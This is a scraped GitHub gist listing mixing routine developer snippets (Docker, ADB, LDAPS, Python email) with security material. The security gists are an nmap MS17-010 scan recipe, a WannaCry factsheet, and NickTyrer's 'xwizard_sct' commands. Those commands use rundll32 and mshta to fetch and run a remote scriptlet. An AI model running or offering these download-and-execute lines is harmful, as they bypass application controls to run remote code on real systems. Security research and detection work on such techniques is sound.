Skip to content

Instantly share code, notes, and snippets.

View tuantmb's full-sized avatar
😹

Tuan T tuantmb

😹
  • Vietnam
View GitHub Profile
@NickTyrer
NickTyrer / instructions.txt
Last active May 1, 2023 13:12
xwizard_sct
xwizard RunWizard {00000001-0000-0000-0000-0000FEEDACDC}
verclsid.exe /S /C {00000001-0000-0000-0000-0000FEEDACDC}
create new folder and rename file.{00000001-0000-0000-0000-0000FEEDACDC}
rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";o=GetObject("script:https://gist.githubusercontent.com/NickTyrer/0598b60112eaafe6d07789f7964290d5/raw/7717cfad109fc15a6796dd9119b0267f7a4df3fd/power.sct");close();
mshta javascript:o=GetObject("script:https://gist.githubusercontent.com/NickTyrer/0598b60112eaafe6d07789f7964290d5/raw/7717cfad109fc15a6796dd9119b0267f7a4df3fd/power.sct");o.Exec();close();
@Neo23x0
Neo23x0 / nmap-cmdline
Last active March 19, 2020 17:10
Nmap Scan Params for CVE-2017-0143 MS17-010 Scanning
# Scan for CVE-2017-0143 MS17-010
# The vulnerability used by WannaCry Ransomware
#
# 1. Use @calderpwn's script
# http://seclists.org/nmap-dev/2017/q2/79
#
# 2. Save it to Nmap NSE script directory
# Linux - /usr/share/nmap/scripts/ or /usr/local/share/nmap/scripts/
# OSX - /opt/local/share/nmap/scripts/
#
@rain-1
rain-1 / Wannacrypt0r-FACTSHEET.md
Last active March 10, 2024 11:03 — forked from Epivalent/Wannacrypt0r-FACTSHEET.md

WannaCry|WannaDecrypt0r NSA-Cyberweapon-Powered Ransomware Worm

  • Virus Name: WannaCrypt, WannaCry, WanaCrypt0r, WCrypt, WCRY
  • Vector: All Windows versions before Windows 10 are vulnerable if not patched for MS-17-010. It uses EternalBlue MS17-010 to propagate.
  • Ransom: between $300 to $600. There is code to 'rm' (delete) files in the virus. Seems to reset if the virus crashes.
  • Backdooring: The worm loops through every RDP session on a system to run the ransomware as that user. It also installs the DOUBLEPULSAR backdoor. It corrupts shadow volumes to make recovery harder. (source: malwarebytes)
  • Kill switch: If the website www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com is up the virus exits instead of infecting the host. (source: malwarebytes). This domain has been sinkholed, stopping the spread of the worm. Will not work if proxied (source).

update: A minor variant of the viru

@nickoala
nickoala / 0_python_email.md
Last active April 29, 2024 05:54
Use Python to send and receive emails

Use Python to:

  • send a plain text email
  • send an email with attachment
  • receive and filter emails according to some criteria
@khanhicetea
khanhicetea / install.sh
Last active April 21, 2018 08:17
Install Docker And Docker Compose Ubuntu 16.04
#! /bin/bash
export DEBIAN_FRONTEND=noninteractive
sudo apt -y update
sudo apt install apt-transport-https ca-certificates
sudo apt-key adv --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys 58118E89F3A912897C070ADBF76221572C52609D
echo "deb https://apt.dockerproject.org/repo ubuntu-xenial main" | sudo tee /etc/apt/sources.list.d/docker.list
sudo apt -y update
sudo apt purge lxc-docker
sudo apt-cache policy docker-engine
sudo apt -y install linux-image-extra-$(uname -r) linux-image-extra-virtual
@gayanvirajith
gayanvirajith / android-sqlite-database.md
Last active June 13, 2020 06:54
Connect to Sqlite3 via Android ADB Shell

Connect to Sqlite3 via ADB Shell

Enter the command adb devices to get the list of your devices: ~/Android/Sdk/platform-tools/adb devices

Connect a shell to your device: ~/Android/Sdk/platform-tools/adb -s emulator-5584 shell

Navigate to the folder containing your db file: cd data/data//databases/

@magnetikonline
magnetikonline / README.md
Last active April 30, 2024 23:49
Enable LDAP over SSL (LDAPS) for Microsoft Active Directory servers.

Enable LDAP over SSL (LDAPS) for Microsoft Active Directory servers

Tip

Microsoft active directory servers by default provide LDAP connections over unencrypted connections (boo!).

The steps below will create a new self signed certificate appropriate for use with and thus enabling LDAPS for an AD server. Of course the "self-signed" portion of this guide can be swapped out with a real vendor purchased certificate if required.

Steps have been tested successfully with Windows Server 2012R2, but should work with Windows Server 2008 without modification. Requires a working OpenSSL install (ideally Linux/OSX) and (obviously) a Windows Active Directory server.

@rosswd
rosswd / bitsadmin.md
Last active November 1, 2022 09:27
Use bitsadmin to download via the command line on Windows 7 (8?)

Download via the command line on Windows 7

If you want to test your connection or have some other reason to use the command line to download a file, this is how.

See http://superuser.com/a/284147 for more information.

Open cmd.exe and use this format:

bitsadmin /transfer debjob /download /priority normal http://cdimage.debian.org/debian-cd/current-live/i386/iso-hybrid/debian-live-8.7.1-i386-xfce-desktop.iso D:\Users\[Username]\Downloads\debian-live-8.7.1-i386-xfce-desktop.iso
@dogrocker
dogrocker / Oh my zsh with autosuggestions & syntax-highlighting.md
Last active May 1, 2024 21:18

Oh my zsh.

Install with curl

sh -c "$(curl -fsSL https://raw.githubusercontent.com/robbyrussell/oh-my-zsh/master/tools/install.sh)"

Enabling Plugins (zsh-autosuggestions & zsh-syntax-highlighting)

  • Download zsh-autosuggestions by
@bastman
bastman / docker-cleanup-resources.md
Created March 31, 2016 05:55
docker cleanup guide: containers, images, volumes, networks

Docker - How to cleanup (unused) resources

Once in a while, you may need to cleanup resources (containers, volumes, images, networks) ...

delete volumes

// see: https://github.com/chadoe/docker-cleanup-volumes

$ docker volume rm $(docker volume ls -qf dangling=true)

$ docker volume ls -qf dangling=true | xargs -r docker volume rm